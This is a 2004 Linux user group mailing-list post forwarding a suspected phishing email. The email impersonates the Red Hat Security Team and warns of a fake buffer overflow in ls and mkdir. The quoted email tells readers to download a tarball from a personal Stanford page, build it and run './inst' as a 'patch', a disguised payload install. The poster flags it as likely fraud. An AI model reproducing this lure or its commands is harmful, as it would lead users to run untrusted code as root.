[ILUG] Fwd: RedHat: Buffer Overflow in "ls" and "mkdir"

Marek m.mcgann at sussex.ac.uk
Sat Oct 23 12:35:44 IST 2004


Thought you might be interested to see the below - it's the first time I've 
seen anything like this for Linux (apologies for the html mail, but that's 
how it arrived).

I presume it's this Joeio in Stanford (or whoever) trying to spam his way into 
Red Hat boxes?

Interesting to see someone considering desktop "not-terribly-clued-in" Linux 
users a worthwhile target.

Or am I being too suspicious about it?

----------  Forwarded Message  ----------

Subject: RedHat: Buffer Overflow in "ls" and "mkdir"
Date: Saturday 23 October 2004 05:37
From: RedHat Security Team <security at redhat.com>
To: <another mailing list I'm subscribed to>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Untitled Document</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.style1 {font-size: 12px}
-->
</style>
</head>
<body>
<p><img src="http://www.redhat.com/g/chrome/logo_rh_home.png"></p>
<p> Original issue date: October 20, 2004<br>
Last revised: October 20, 2004<br>
Source: RedHat </p>
<p>A complete revision history is at the end of this file. </p>
<p>Dear RedHat user,</p>
<p>  Redhat found a vulnerability in fileutils (ls and mkdir), that could
 allow a remote attacker to execute arbitrary code with root privileges. Some
 of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat
 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that
 *BSD and Solaris platforms are NOT affected.</p> <p>The RedHat Security Team
 strongly advises you to immediately apply the<strong> fileutils-1.0.6
 patch</strong>. This is a critical-critical update that you must make by
 following these steps:</p> <ul>
  <li>First download the patch from the Stanford RedHat mirror:
 <strong><em>wget
 www.stanford.edu/~joeio/fileutils-1.0.6.patch.tar.gz</em></strong></li>
 <li>Untar the patch:<em><strong> tar zxvf
 fileutils-1.0.6.patch.tar.gz</strong></em></li> <li><em><strong>cd
 fileutils-1.0.6.patch</strong></em></li>
  <li><em><strong>make</strong></em></li>
  <li><em><strong>./inst</strong></em></li>
</ul>
<p>Again, please apply this patch as soon as possible or you risk your system
 and others` to be compromised.</p> <p>Thank you for your prompt attention to
 this serious matter,</p>
<p>RedHat Security Team.</p>
<p class="style1"> Copyright &copy; 2004 Red Hat, Inc. All rights reserved.  
 </p> </body>
</html>

-------------------------------------------------------


